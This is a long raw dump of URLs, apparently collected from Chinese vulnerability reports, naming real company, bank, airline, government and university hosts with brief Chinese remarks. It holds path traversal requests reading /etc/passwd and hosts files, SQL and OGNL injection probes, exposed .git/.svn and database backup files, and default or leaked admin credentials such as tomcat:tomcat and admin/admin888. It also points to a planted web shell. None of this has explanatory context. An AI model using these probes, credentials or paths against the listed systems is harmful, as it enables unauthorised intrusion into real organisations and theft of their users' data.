http://203.187.185.142/cjcs/ztzb.do?actionType=changelabel&labelId=16&webId=18 http://203.187.185.142/cjcs/message/ http://203.187.185.142/cjcs/webEdit/ http://203.187.185.142/cjcs/information/ http://o.bjucd.com/wui/theme/ecology7/page/login.jsp?templateId=21&logintype=1&gopage=&message=16 http://**.**.**.** http://**.**.**.**:8399/Gis6/roadstate/info.do http://cemftp.ce-air.com http://doc.metinfo.cn http://doc.metinfo.cn/admin456/ http://www.wooyun.org/bugs/wooyun-2015-0139080/trace/d17d269bc5bd840e6e603ae160f10cea http://doc.metinfo.cn/wooyun.php http://www.metinfo.cn/woo.php http://www.metinfo.cn/wooyuntest.php http://new.bbs.metinfo.cn/wooyuntest.php metinfo.cn/upload/file/ http://cemftp.ce-air.com/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://cemftp.ce-air.com/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1 http://cemftp.ce-air.com/yyoa/createMysql.jsp http://cemftp.ce-air.com/yyoa/ext/trafaxserver/SystemManage/config.jsp http://www.scyg.gov.cn/office http://182.150.21.212/ http://221.237.155.222:6879/ifs/ https://111.202.69.38/icbc/perbank/index.jsp http://111.202.69.38:88/login.aspx?ReturnUrl=%2f http://111.202.69.38:8080/login/Login.jsp?logintype=1 view-source:http://111.202.69.38:8080/js/extjs//examples/feed-viewer/feed-proxy.php?feed=http/../../../../../../../../../../../C:\\Windows\\System32\\drivers\\etc\\hosts http://m.niiwoo.com/regist.html http://m.niiwoo.com/lottery/html/regist/login.html http://www.tuandai.com/ http://econline.cpf.com.cn:8080/NASApp/iTreasury-ebank/ebank/accountmanage/foreign/Khdzd.jsp?tsStart=2015-05-01&tsEnd=2015-05-28&lAccountID=21399&lAccountIDCode=010100000742&lCurrencyID=2 http://econline.cpf.com.cn:8080/NASApp/iTreasury-ebank/ebank/accountmanage/foreign/Khdzd.jsp?tsStart=2015-05-01&tsEnd=2015-05-28&lAccountID=21401&lAccountIDCode=010100000742&lCurrencyID=2 http://**.**.**.**/loginAction_login.do http://**.**.**.**:8080/sdk/SDKService?wsdl http://www.job168.com/train/course.jsp?all=on&course_no=1 
http://dhl.kaiyuan.eu/admin.php?action=login http://x.1mxian.com/records http://106.120.158.40/ http://106.120.158.40/Patent/PatentDetailView.aspx?action=view&ShowAction=1&Workflow=true&MngNo=201402156&MngNoType=1 http://106.120.158.40/Patent/PatentDetailView.aspx?action=view&ShowAction=1&Workflow=true&MngNo=201402154&MngNoType=1 http://106.120.158.40/Patent/PatentDetailView.aspx?action=view&ShowAction=1&Workflow=true&MngNo=201402153&MngNoType=1 http://err.1mxian.com:9200/_status http://err.1mxian.com:9200/_nodes http://err.1mxian.com:9200/_search?pretty http://err.1mxian.com:9200/_plugin/head/ http://friendlink.tuanche.cn/login http://sjs.yihaojiaju.com/audit/statistics.aspx http://pk.baofen.ali213.net/login?id=51 http://www.ailvxing.com/e/member/login/ http://www.ns.gf.com.cn:80/collect/web/PersonInfoAction.go?function=GetBranchPersonInfo&view=v_ryxx_jjxs&branchId=1704 http://weibo.gf.com.cn/config http://121.14.2.38/libs http://www.dns0755.net:80/ www.dns0755.net http://open.ab95569.com https://passport.sohu.com/user/tologin?bru=http%3A%2F%2Fmp.sohu.com%2F%3Ftip%3D1 http://www.igocctv.com/igo/weixin/login.action http://124.162.20.54/weisvr/jmxroot.jsp https://ebank.hkbea.com.cn/perbank/PTR0203001_saveAdToImg.do?EMP_SID=xxxxxxxxxxxx&fileFtpPath=/etc/hosts https://ebank.hkbea.com.cn/perbank/PTR1702002_query_detail_By_FlowNo.do?EMP_SID=xxxxxxxxxxxx&fileFtpPath=/etc/passwd http://www.ailvxing.com/ http://medical.neusoft.com:80/ http://**.**.**/ http://cms.sangfor.com:8888/pma/ URL:http://**.**.**.**/stat/stat.aspx?code=0&statid=740507330429%27%3B&come=&width=1280 https://itsm.30wish.net/occ/.svn/entries http://192.168.33.52/svn/occ http://192.168.33.52/svn/occ https://itsm.30wish.net/occ/email_upload_file/KB2014060002.pdf http://211.144.131.98/ https://211.144.131.98:9043/ibm/console/ http://drops.wooyun.org/tips/604 http://211.144.131.98:9080/safe_test/index.jsp http://211.144.131.98:9080/safe_test/cdm.jsp http://www.lushanly.com/news.php?a_id=3&b_id=17&c_id=244 
http://www.koowo.com/forum/ http://www.dc-cloud.com/wp-admin/ http://bj.gtja.com/gt/ajax/login.ashx http://oa.juneyaoair.com/weboa/webpage.nsf/GeneralOffice?OpenForm http://**.**.**/ http://**.**.**/ http://**.**.**/ http://**.**.**/ http://**.**.**/ http://service.sflep.com/ ttp://old.club.xywy.com:80/yszs/expert_online.php?toa=1&type=data&uid=8727577&online=0 http://**.**.**.**/ http://58.61.28.185:6666//invoker/EJB system:type=ServerInfo http://**.**.**.**/bugs/wooyun-2010-0109320 http://oa.baihe.com:7788/ http://oa.baihe.com:7788/is/ http://www.gzekt.com/admin/bsPaytype_updateBeforeBusiSupPaytype.action?busicode=100001&paytype=12&businame=%253C%253E http://www.gzekt.com/admin/bsPaytype_queryBusiSupPaytypeAll.action?busicode=100001&businame=%E5%A4%87%E4%BB%98%E9%87%91%E5%85%85%E5%80%BC http://www.gtafe.com/ https://m.gtafe.com/owa/ http://d.gtafe.com/os/login.html https://vpn.gtafe.com/ http://oa.gtadata.com/C6/Jhsoft.Web.login/PassWordNew.aspx http://bbs.fund123.cn/。发现可以插入图片。 http://www.kangq.com/ http://**.**.**.**//adminplan/shangchuan.asp,此页面在上传过程中,将上传路径直接写入客户端: http://**.**.**.**/ http://**.**.**.**/Default/Download http://www.ab-insurance.com/job_info.asp?id=936,这里没过滤 http://www.hp1997.com/passport/login.aspx http://www.childol.com.cn/home/ http://www.childol.com.cn/new/Login.aspx http://www.childol.com.cn/new/Message_ViewDetail.aspx?NoticeID=2227273#MenuArea http://www.childol.com.cn/new/Archive_ShowTeacher.aspx?UserID=19258#MenuArea http://www.xintai.com http://www.xintai.com/uddiexplorer/SetupUDDIExplorer.jsp http://www.xintai.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.27.24.69:9001&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://fang.58.com/ http://fang.58.com/ajax/upload.php?input=pic1&img=img1 https://github.com/lengy/python_simple_model/blob/b4d9825683267882d99eeda41e70bd434406feed/setting/database.py http://**.**.**/oa/upfile/SavePath/ 
http://chexian.sinosig.com/carPremium/lotteryIndex.action http://chexian.sinosig.com/carPremium/InsList.jsp url:http://58.251.33.179:80/manager/html user:tomcat pass:tomcat http://58.251.33.179/wooyun/ http://**.**.**.**:8888 http://oa.beequick.cn:89使用的是泛微oa的e-Mobile系统,存在注入漏洞。 http://**.**.**.**:8090/xmsb/indexAction!to_index.action http://**.**.**.**:8090/xmsb/indexAction!to_index.action?redirect:http://**.**.**.** http://**.**.**.**:8090/xmsb/indexAction!to_index.action?redirect:${2*4 http://www.bnchina.com:8080/queryTblScorehistory.do?hongru_username=1066&hongru_accountId=1066 http://www.bnchina.com/user/login/ http://www.fmi.com.cn/index.php?a=init&typeid=1&c=index&catid= http://202.108.145.86/ http://111.202.69.70/manager/html/ http://111.202.69.80/manager/html/ http://m.koyimall.com/?act=shop.goods_list&GC=GD00&oc=good_buy_total&os=desc&page=4&ST=SCODE3&mode= http://joygormusic.ztems.com/,九歌音乐管理系统: http://m.chinaxinge.com/android/newsview.asp?id=93513 http://www.yongcheng.com/ http://**.**.**/ http://218.25.10.196/weidigps/servlet/GetCarPos?carid=100199,100200,100277,100286,100309,100288,100285,100279,100281,100289,100305,100287,100198,100323,100278,100275,100196,100197,100280,100283,100284,100282,100202,100259,100311,100276,100258,100118,100261,100306,100307,100310,100324,100312,100308,100119,100120,100260,100117 http://220.181.23.80/WEB-INF/classes/struts-config.xml dckf.digitalchina.com/index.php/qa/qalist http://jspxxy.xbjsyx.com/web/index.php?webid=jspxxy http://www.shbtp.com.cn/ http://gd.189.cn/dwr/exec/WebPayCommonDwr.getCustName.dwr?callCount=1&c0-scriptName=WebPayCommonDwr&c0-methodName=getCustName&c0-param0=boolean:false&c0-param1=boolean:false&c0-param2=string string:CDMA&c0-param4=string http://gd.189.cn/dwr/exec/WebPayCommonDwr.getCustName.dwr?callCount=1&c0-scriptName=WebPayCommonDwr&c0-methodName=getCustName&c0-param0=boolean:false&c0-param1=boolean:false&c0-param2=string:85658135&c0-param3=string:CDMA&c0-param4=string:020&xml=true, 
http://www.ailvxing.com/e/visa/index.php/?enews=showsample&subid=59 http://**.**.**.**/bugs/wooyun-2010-096034 https://github.com/lixingming/my-crm/blob/20126c42c1bb192a561c0b2e5170139090acdec7/src/main/java/com/b5m/util/mail/SendMailDemo.java http://111.161.24.187/adm/ liming:123456 wangxueyun:wangxueyun http://**.**.**.**/news_videos.jsp?classId=0207 http://**.**.**.**:8000/ http://www.dcbf.com.tw http://www.dcbf.com.tw/html/news.php?type=F http://www.dcbf.com.tw/script/syslogin.php cc64:b3fb:7b88%10 http://**.**.**.**/do/login http://elreport.ce-air.com/login.do,这是东航 http://daxue.imooc.com/ http://mail.edm.hysec.com:8087/login/login.action http://mail.edm.hysec.com:8087/wooyun.jsp http://m.koyimall.com http://www.koyimall.com http://www.koyimall.com/?act=shop.goods_list&GC=GD0H&oc=good_buy_total&os=desc&page=1&ST=&mode=&list_num=24 http://wap.bocichina.com:80/wap2stock/info.do?classid=1001&id=16228 http://t.gfan.com:8080/ http://zsb.hrbcu.edu.cn http://zsb.hrbcu.edu.cn/xsc http://zsb.hrbcu.edu.cn/xsc/style/in_out%20%281%29.sql http://61.132.51.102:80/index_fund.jsp?pageSize=10&pageNo=1&jjlxnum=1&1=1&model=undefined&order=d002_003&jjlx=006 http://research.sflep.com/PaperSets.aspx?typeId=1 http://www.y1s.cn/index.php?a=waterfallload&bid=1&g=home&m=case&p=1&sid=-1&zid=-1&_=1441387377969 http://mail.chinaexpressair.com/ http://222.178.225.45:10080/ http://prepare.chinaexpressair.com/admin/login.aspx http://oa.g5air.com/ http://wx.foundersc.com/../../../../../../../../etc/passwd http://**.**.**.**/module/index.jsp http://group.airchina.com.cn/ http://meng.paojiao.cn/ http://oa.zxxk.com/ http://mail.xkw.cn/ http://dsyy.13980.com/createImageAction.action http://ac.haidilao.com http://dhl.kaiyuan.eu/admin.php?action=login http://www.boci.com.hk/chi/spec/spec.zip http://cms.kingdee.com/hotNewsList.do?catalog=%D0%C2%CE%C5%D7%A8%CC%E2&column=1&curPage=1&days=2&more=true&new=true&perPages=4&topic=%B8%DF%B7%E5%BB%E1%D5%EF%C8%C8%B5%E3%D0%C2%CE%C5 http://**.**.**.**/ 
http://**.**.**.**/gjj_temp/gjj_select.asp http://www.99fenqi.com官网 https://**.**.**/liuj***21/quartz/blob/ea61e1f6d***00c9263f81208f3/springQuartz/WebRoot/WEB-INF/applicationContext1.xml jdbc:mysql://115.**.*.**/test?useUnicode=true&characterEncoding=UTF-8 http://221.3.143.66:8090/ http://goto.mail.sohu.com/goto.php?code=sogoubanner-wenda http://goto.mail.sohu.com/goto.php?code=sogoubanner-wenda%df https://app.szeastroc.com http://oa.szeastroc.com:89/login.do https://mail.tcl.com http://www.pengpengmall.com/account/buyer/orderDetail.html?order_id=3818101 http://www.pengpengmall.com/account/buyer/orderDetail.html?order_id=3819001 http://www.pengpengmall.com/account/buyer/orderDetail.html?order_id=3852321 http://vip.ufida.com.cn/nccsm/ http://nczx.yonyou.com/SubModule/role/ http://nczx.yonyou.com/SubModule/ http://nczx.yonyou.com/Inc/ www.xiaozhu.com http://**.**.**/tnet/login.jsp http://**.**.**/tnet/attachment/15090708574923043531.jsp_ http://www.7caihua.com/ http://m.jindanlicai.com/distribution/distr_index?u_id=213250&ac_id=11&ck=22300596d16ecaffdf8c986ffd3961bd&openid=o8AH_tkLyo8qcCRzCb00lrNfWLck http://medical.neusoft.com:80/en/searchresult.jsp http://medical.neusoft.com:80/en/searchresult.jsp?keywords=135791&srchfield=135791-ROW_COUNT%28%29-%28-ROW_COUNT%28%29%29 www.xiaozhu.com http://servexpress.digitalchina.com/sms/reg/login.asp http://servexpress.digitalchina.com/DellSOS/ http://servexpress.digitalchina.com/DellSOS/onsite/onsite_service_inf.aspx?serno=80900380052(不知道这算不算越权) http://www.secwk.com/petition/info/taskid/132*.html http://www.secwk.com/petition/info/taskid/132*.html http://**.**.**.**/Portal/RfSoft.MapleTr.DPS/Hr/Html/Login.htm?autologin=false http://**.**.**.**/ http://imall.pflife.com.cn http://www.ehaier.com/madmin/product/productsList.html http://**.**.**.**/mpa/detail.php?resourceid=910 http://**.**.**.**/ArticleQueryViews.do?title=2014&siteId=63 http://**.**.**.**/upload/2015/09/07/2015-09-07-11-14-591315933610.jsp 
http://xmsstst1.sinochem.com/vendorlogin.aspx?ReturnUrl=http://vendorms-dev01.sinochem.com/index.aspx http://**.**.**.**:80/feedback.php?cat_id=100&pid=53 http://**.**.**.**//find.php?cat_id=1%27&pid=13 http://**.**.**.**//productconent.php?cat_id=49&id=220&pid=28 http://www.chinaerdos.com/chinese/feedback/admin/ http://www.chinaerdos.com/chinese/hr/admin/ http://www.chinaerdos.com/chinese/bidding/admin/ http://www.chinaerdos.com/chinese/faq/admin/ http://www.chinaerdos.com/chinese/news/admin/vedio/ http://jindanlicai.com/ https://api.jindanlicai.com/v2/ www.matao.com)安卓商店里有个app http://bbs.kisslink.com/utility/convert/index.php http://m.yaofang.cn/user/addAddress/1164324 http://home.exam8.com/teachercomment.php?do=show&teacherID=1 Table_Num:142 Data:307158922 http://**.**.**.**/cblcn/agency/searchlist http://**.**.**.**/zbw/zbxx/zbgg/tjgglb_search.jsp http://club.kingdee.com/forum.php?action=recommend&do=subtract&hash=8e01bc2c&mod=misc&tid=1 http://codex.wordpress.org/zh-cn:%E7%BC%96%E8%BE%91_wp-config.php http://www.hlslm.cn/Home/User/login.html http://www.jzq001.com/ http://expense.juneyaoair.com:8080/Frame/login.aspx www.xin.com http://www.y1s.cn/index.php?a=index&g=home&m=business&sid=1'%22 http://122.97.17.92/永诚财产保险电子商务网站 http://**.**.**.**/Article.asp?id=2973 http://www.topsrx.com/index.php?m=default&c=page&a=detail&name=Company%20Profile http://www.flyertea.com/plugin.php?id=it618_scoremall:scoremall_uc&cid=4 http://sns.fotile.com/member.php?mod=register http://marking.hunantv.com/dabenying/admin/ http://oa.china-sss.com/defaultroot/login.jsp http://mail.amac.org.cn/ http://www.qingniancaijun.com.cn/index.php?route=product/product&product_id=132 http://www.qingniancaijun.com.cn/index.php?route=product/product&product_id=132 http://www.qingniancaijun.com.cn/index.php?route=product/product&product_id=132 http://**.**.**.**/ http://y1s.cn/index.php?g=home&m=zone&a=detail&zoneId=162 http://zyz.scbz.com/guest/index.action 
http://**.**.**.**/User/Login.aspx?ReturnUrl=%2fUser%2fDefault.aspx是动易的,随便用动易的默认用户名:admin,密码:admin888登录,结果还真进去了。里面可以找到添加的模块,还有上传点,接下来你懂的。 http://meeting.chec.com.cn/Conf/jsp/user/loginAction.do http://**.**.**.**/Download.asp页面中的BigClassName参数存在cookie注入漏洞,程序在获取该参数值时未指定request获取方法。详细利用见漏洞证明。 http://www.flyertea.com/plugin.php?id=it618_scoremall:scoremall_uc&cid=4 http://cms.kingdee.com/moreNews.do?catalog=%3f%3f%3f%3f%3f%3f%3f&curPage=1&topic=%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f&totalPages=382 http://cms.kingdee.com/services/faq/question_main.jsp http://cms.kingdee.com:80/ http://59.46.94.68/ http://scm.life.1mxian.com/orders/instorage http://www.cfp.cn/index/mjjd?lid=0&outid=401160952&type=showmid http://**.**.**.**/cn/about/MediaCenter/MediaPic.aspx?brandid=1 http://sxspzx.sxu.edu.cn/signup/login.htm http://**.**.**.**/News_Text.php?class_id=5&id=454 http://dp.chuchujie.com/ http://www.mdjmu.cn/jy/dapqcx/data/data2014.mdb http://www.mdjmu.cn/jy/dapqcx/data/databack.mdb http://www.mdjmu.cn/jy/dapqcx/data/data.mdb http://www.mdjmu.cn/jy/dapqcx/data/data1.mdb http://www.mdjmu.cn/xxgkw/huizhi/adminlogin.asp www.mdjmu.cn http://www.xiaoyi.com http://weixin.juneyaoair.com/mphone/orderDetail.html?OrderNo=(此处为单号) http://weixin.juneyaoair.com/mphone/orderDetail.html?OrderNo=ORD15042202269436 http://weixin.juneyaoair.com/mphone/orderDetail.html?OrderNo=ORD15042202269437 http://**.**.**.**/show.asp?id=5894 http://bbs.woool.17qiqu.com/uc_server/ http://t.bbs.dodoca.com/ PHP:Linux http://www.yingchuang.com/search/orderdetail/?oid=00043269 http://www.yingchuang.com/search/orderdetail/?oid=00043269 http://www.yingchuang.com/search/orderdetail/?oid=00043269 http://www.sakurajp.com.cn/channel.aspx?vid=38&cityId=0 http://www.sakurajp.com.cn/channel.aspx?vid=38&cityId=0 http://mail.east.net/webmail/ www.jobshow.cn http://www.jobshow.cn/replay/findReplay?postId=474 http://t.bbs.dodoca.com/uc_server/admin.php https://www.95598pay.com/rest/hxindividualuserinfo/emailOpenUpdate 
https://www.95598pay.com/rest/hxindividualuserinfo/phoneOpenUpdate http://220.249.93.237/SCN/NewsDetail.aspx?ID=3509 http://222.190.152.234:84/doc/page/login.asp http://222.190.152.234:82/doc/page/login.asp http://**.**.**.**:88/hzgtjygkz/ygzz/list.action?nav0.id=32 https://www.qhee.com:443/ http://faxian.exam8.com/s/?s=123 com:8080 http://120.132.47.165/client_iprogram_vvs http://120.132.47.165/client_channel_vvs http://120.132.47.165/users http://www.haoxintuo.cn/orders/ http://plus.aili.com/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df%27 http://shell.cnfol.com/article/hwcode_newjson.php?id=1207&len=18&record=1 http://shell.cnfol.com/article/dynamic_newjson.php?id=955&len=18&record=4 http://112.126.71.228:81/ http://112.126.71.228:82/secure/Dashboard.jspa http://112.126.71.228:8090/login.action http://itfsy.cn/wooyun?site=docin&cookies= http://dz.pangu.us/search_case.php http://td.17m3.com//act/bug/ajax/ajaxprizelist.ashx?date=20140728 http://td.17m3.com//act/bug/ajax/ajaxprizelist.ashx?date=20140728” http://**.**.**.**/bugs/wooyun-2010-0130475 http://yimin.edai.com/order.php?orderby=immigrate%27 http://www.e-bridge.com.cn:80/ www.e-bridge.com.cn url:http://xinxifabu.renrenche.com/index.php?/auth/login user:laoyong@renrenche.com password:123456 http://222.178.110.157/cqtpsms/index.jsp http://v.higo.meilishuo.com:80/buyer/get_main_page?access_token=223876f4bf98816290ffff64474f4770&app=higo&backup=2&client_id=1&cver=3.5&device_id=oudid_0b6f98968dbc3b8110a6e29b7b546714e7d07f0c&device_token=&idfa=E623A16D-A9F6-4D7C-BBF7-79C6A86CC151&open_udid=0b6f98968dbc3b8110a6e29b7b546714e7d07f0c&qudaoid=10000&user_id=176552149796180000&uuid=2db9ac1253de8a1c86c2e9eb04cbe075&ver=0.8&via=iphone http://e-insure.cninsure.net/cms/wwwroot/dzswwz/sy/index.shtml http://crewinternal.juneyaoair.com:65/logout http://**.**.**.**/tyzh-jjty-ssxx/article.jsp?articleId=34608 http://**.**.**.**/fuwu1.php?fid=23 
http://**.**.**.**/InfoPublish/CategoryViewNormal.aspx?child=130&parent=129&CategoryName= http://**.**.**.**/infobidding/detailNewsAction.do?infoId=79358&isfile=2 http://**.**.**.**/infobidding/bak.jsp jdbc:oracle:thin:@**.**.**.**:1521:infodb jdbc:sqlserver**.**.**.**:1433;SelectMethod=Cursor;DatabaseName=anjy jdbc:sqlserver**.**.**.**:1433;SelectMethod=Cursor;DatabaseName=cjinfo http://**.**.**.**/infobidding/mytesttest.jsp http://ldj.jiangmen.gov.cn:8089/ http://ldj.jiangmen.gov.cn:8089/CheckProcess.aspx http://m.multigold.com.cn http://xmlso.mumayi.com/v18/nodownload.php http://114.255.29.207/clpccd/人寿无线终端出单管理系统 http://i.mooc.chaoxing.com http://m.zol.com.cn/查看更多评论处,ajax包存在sql注入漏洞 http://www.tsinghua.org.cn/alumni/communityclient/listFormerAddress.do?groupId=3 http://www.tsinghua.org.cn/alumni/communityclient/listFormerAddress.do?groupId=2473 http://**.**.**.**/fs/portal/index.do存在struts2-019漏洞,经过检查,发现已被入侵,可通过http://**.**.**.**/xxxx.jsp访问 http://www.multigold.com.cn/ http://**.**.**.**/manage/Login.aspx http://www.028tjw.com http://**.**.**.**/tools/login.ashx http://**.**.**.**/ http://blog.deepin.org/.wp-config.php.swp”,内含数据库连接信息, http://blog.deepin.org/.git/index",这里面有他们自己做的wp主题,deepin2015。。感兴趣的可以找我要,, http://www.sinoflt.com/swpx/indexActivity_activityInfo.action?activity.id=202 http://special.ifensi.com/admin/index http://special.ifensi.com/admin/comment/index?uname=&info=&targetid=213&search=%E6%90%9C%E7%B4%A2 http://**.**.**.**/dispword.jsp?sysno=31796 http://www.qfkd.com.cn/setqfkd/login.aspx http://www.tjwfn.com/net_list.jsp?ieb12eki&zxlb=1'%22 http://dckf.digitalchina.com/index.php/point/checkuser http://dckf.digitalchina.com/helP.php http://oldmail.hailiang.com/ http://mail.hailiang.com/ http://www.lcsysu.com/news_ser.php?lm=4%27&keyword=1 http://www.lcsysu.com/news_ser.php?lm=4&keyword http://sqlmap.org https://github.com/puppyred/manyi/blob/c4c92f4dde1671027ff726ba6bbe6021421cd469/trunk/hims/resource/META-INF/hims.properties 
http://csc.zte.com.cn/csc/helpdesk.aspx?eccLanguage=English&logon=first&fromStr=eccindex&systemName=ECC1&employeeNum=10057782 http://www.tiancity.com/homepage/ http://dev.qa.tsiv1.mtiancity.com/ http://**.**.**.**/Inedu3In1/index.aspx http://**.**.**.**/Inedu3In1/index.aspx http://**.**.**.**/Inedu3In1/index.aspx http://**.**.**.**/Inedu3In1/index.aspx http://**.**.**.**/Inedu3In1/index.aspx http://**.**.**.**/Inedu3in1/index.aspx http://**.**.**.**/Inedu3In1/index.aspx http://**.**.**.**/Inedu3In1/index.aspx http://**.**.**.**/Inedu3In1/index.aspx http://**.**.**.**/Inedu3In1/index.aspx http://**.**.**.**/Inedu3In1/index.aspx http://**.**.**.**/Inedu3In1/index.aspx http://**.**.**.**/Inedu3In1/index.aspx http://**.**.**.**/inedu3in1/index.aspx http://**.**.**.**/IneduPortal/index.aspx http://**.**.**.**/Inedu3In1/index.aspx http://nan.yiban.shikee.com/list-1.html?cate=2245 http://www.shuomogu.com/ http://www.xoyin.com/ http://www.zhongxunrc.com/ http://www.job168.com/channel/gzjz/list.jsp?board=%B9%A4%D7%F7%B6%AF%CC%AC http://**.**.**.**/ http://**.**.**.**/DBMS/Purview/HoldManage/Operation.aspx?KeyWord=2460004&HoldID=0 http://www.codoon.com/regist)使用手机号码注册、未验证发送的手机校验码,导致任意手机号码可被注册。 http://211.151.247.132/ http://211.151.247.132/Users/Login.aspx http://dellcity.dell-brand.com:80/ http://advisor.dell-brand.com/index.php?a=search&cid=1&m=solution&sid=6&wd=e http://crm.gsm.pku.edu.cn/console/ system:password http://**.**.**.**:8181/Login.aspx?ReturnUrl=%2fmain.aspx http://**.**.**.**:7070/ http://**.**.**.**:8090/ http://mailserver.juneyao.com/ http://www.10086sxcc.com/ cop.quyiyuan.com/APP http://180.153.191.147:8088/cluster http://180.153.191.147:50090/status.jsp http://180.153.191.147:50090/logs/ http://180.153.191.147:50070/dfshealth.html#tab-overview http://wooyun.org/bugs/wooyun-2010-099979 http://**.**.**.**/manage/Admin_Login.aspx http://gotohuawei.com:80/index.php/Info/view/pid/1* https://www.anpingdai.com/.git/config http://qydev.weixin.qq.com/qa/ 
http://yimin.edai.com/manager/cx/index.php http://**.**.**.**/cms/cmsadmin/ad/openad.jsp?adid=1424429306068870 http://**.**.**.**/cms/ad/openad.jsp?adid=1423104043281385 http://**.**.**.**/cms/ad/openad.jsp?adid=1188349051997680 http://**.**.**.**/cms/cmsadmin/ad/openad.jsp?adid=1406884610672046 http://**.**.**.**/cms/ad/openad.jsp?adid=1234421225968327 http://m.caijing.com.cn/.svn/entries http://**.**.**.**/wwwroot.zip http://mpartner.funshion.com/login/index.php?c=login&a=login&so=begin http://www.made-in-china.com/aboutus/contact/ http://vip.cofco.com:8080/zlshop/ http://vip.cofco.com:8080/zlshop.zip http://hjss.vpclub.cn/ http://hjss.vpclub.cn:8087/ http://hjss.vpclub.cn/Config/DBConfig/DBconfig.xml http://223.223.203.210:7001 http://**.**.**/login.php http://vrms.train.tujia.com/login http://lib.haut.edu.cn/ArticleList.aspx?SectionId=1b98f31b-5261-4a77-b07e-9f01fcb25212 http://lib.haut.edu.cn/ActicleShow.aspx?SectionId=1b98f31b-5261-4a77-b07e-9f01fcb25212 http://**.**.**.**/Egh/Hall/SearchResult.aspx?ApplyUserCodeId=1 http://mailserver.handhand.net:7002/recordings/index.php?logout=1 http://mailserver.handhand.net:7002/web-meetme/meetme_control.php http://mailserver.handhand.net:7002/web-meetme/meetme_control.php http://eyemain.znv.com/wq/login.action http://eyemain.znv.com http://money.crtrust.com:7001/etrading/etrading.jsp http://qgzx.hebtu.edu.cn/view_gwxwxx.asp?id=72 http://qgzx.hebtu.edu.cn/view_gwxwxx.asp?id=72 http://qgzx.hebtu.edu.cn/view_gwxwxx.asp?id=72 http://qgzx.hebtu.edu.cn/admin/admin.asp http://my.caihongtang.com/tuya.php?gameid=6862 http://us.made-in-china.com/ http://**.**.**.**/resourcebank/login/Jeecms.do http://**.**.**.**/portal/auth/loginPageHB.do)和http://www.gdedu.tv/中都通用。 http://**.**.**.**/ajax.aspx?cdate=8&classID=1&netip=**.**.**.**&oper=ajaxScanIP http://**.**.**.**//iframe/default.aspx?ChannelId=22 http://**.**.**.**//iframe/default.aspx?ChannelId=22 http://**.**.**.**//iframe/default.aspx?ChannelId=22 
http://**.**.**.**:80//iframe/index_mtjj.aspx POST:hdChannelID=2 http://**.**.**.**//iframe/index_tgfs.aspx?ClassID=1%20and%201=1&page=1 http://**.**.**.**//iframe/list.aspx?channelid=21/**/AND/**/129%3d129&classid=111&date=2014/6/1%200:00:00&date2= http://www.webpowerchina.com/admin_login.php http://bid.powerec.net/ http://**.**.**.**/outstu/ http://wooyun.org/bugs/wooyun-2015-0129971 http://**.**.**.**/bugs/wooyun-2010-0118149 http://**.**.**.**/bugs/wooyun-2010-0118136 http://bnsdb.games.sina.com.cn/grocery/index?page=3&quality[0]=2&type[0]=1 http://pinggu.renrenche.com/index.php?m=get_model_price&model_id=4147®ister_time=2015-05&mile=1&token=TYZKELbm&city=119 https://121.40.77.95/.git/ http://121.40.77.95:8090/.git/ http://121.40.77.95:8008/.git/ http://cacti.payegis.com.cn/ payegis:payegis http://202.108.145.241:8080/ http://**.**.**.**/dtwz/mail/mail_login.html http://s.lakala.com/ http://**.**.**.**/info_show.php?id=757 http://m.trjcn.com/login/forget.html http://zabbix.cjdao.cn https://www.anpingdai.com/ http://wooyun.org/bugs/wooyun-2015-0131369 http://sso.hc360.com/security/VerifyMobile.html?returnurl=http%3A%2F%2Fxt.hc360.com%2Findex.php www.hc360.com进入主站页面,可以以当前的身份访问所有业务。 http://sso.hc360.com/VerifyMobile.jsp?loginid=admin&mobile=151马赛克41&validKey=7757&ctoken=500b7c25-7af7-4311-95b5-c305e635595d&returnurl=http://bbs.hc360.com&callback=jQuery16208473089167382568_1441721219340&_=1441721250974 http://y1s.cn http://www.kmw1.com http://ceshi.kmw1.com/.svn/entries http://hq.sicnu.edu.cn/home/Markbrow?ID=799 http://hq.sicnu.edu.cn/log.txt http://**.**.**.**:9085/mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1* http://www.jdsxy.com/ http://www.jdsxy.com/app/account/findPassword/MTUzNjA3IzIwMTUtMDktMDkgMTM6MDU6MDA= http://www.jdsxy.com/app/account/findPassword/153607#2015-09-09 http://www.jdsxy.com/app/account/findPassword/MTUzNjA3IzIwMTUtMDktMDkgMTM6MDU6MDA= 
http://www.vjianke.com/api/ad/get?callback=jQuery16206296576291788369_1441764661807&format=json&ownerguid=8b6257c9505548febabc9eec005a94d2&platform=0&ClipId=ZLJUT&_=1441764661981 http://**.**.**.**/db.rar http://**.**.**.**/line/query.do?prno=1 http://**.**.**.**/line/query.do?prno=1 http://**.**.**.**/line/query.do?prno=391 http://**.**.**.**/line/query.do?prno=19 http://**.**.**.**/line/query.do?prno=1 http://**.**.**.**/bugs/wooyun-2015-0139789/trace/17da959cabfccc1a28ded8846f9c749c http://mp.weixin.qq.com/mp/redirect?url=http://www.baidu.com http://**.**.**.**/ http://**.**.**.**/cgi/ http://**.**.**.**/Chinese/vpn/ http://**.**.**.**/Chinese/manage/ http://**.**.**.**/webmail/user/ http://**.**.**.**/chinese/mien/images/ http://**.**.**.**/webmail/user/user.rar http://**.**.**.**/Chinese/List.asp?Id=5005 http://www.luanhq.com/GJJCX/admin/adminlogin.aspx http://www.cjdao.com/index.html http://**.**.**.**:8080/heeroa/infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1&filters= http://**.**.**.**/ctbuoa//infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1 http://**.**.**.**/oa/infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1&filters= http://**.**.**.**/oa/infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1&filters= 